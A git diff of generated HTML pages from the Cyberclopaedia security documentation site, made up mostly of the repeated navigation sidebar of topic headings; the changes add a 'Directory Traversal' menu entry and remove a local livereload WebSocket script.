        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -331,22 +331,6 @@

Problem Class - - diff --git a/docs/Cryptography/Hash Functions/Birthday Attacks.html b/docs/Cryptography/Hash Functions/Birthday Attacks.html index 58611ddb..a0f2c449 100644 --- a/docs/Cryptography/Hash Functions/Birthday Attacks.html +++ b/docs/Cryptography/Hash Functions/Birthday Attacks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -270,22 +270,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html b/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html index f40a4096..b5cb6d7f 100644 --- a/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html +++ b/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
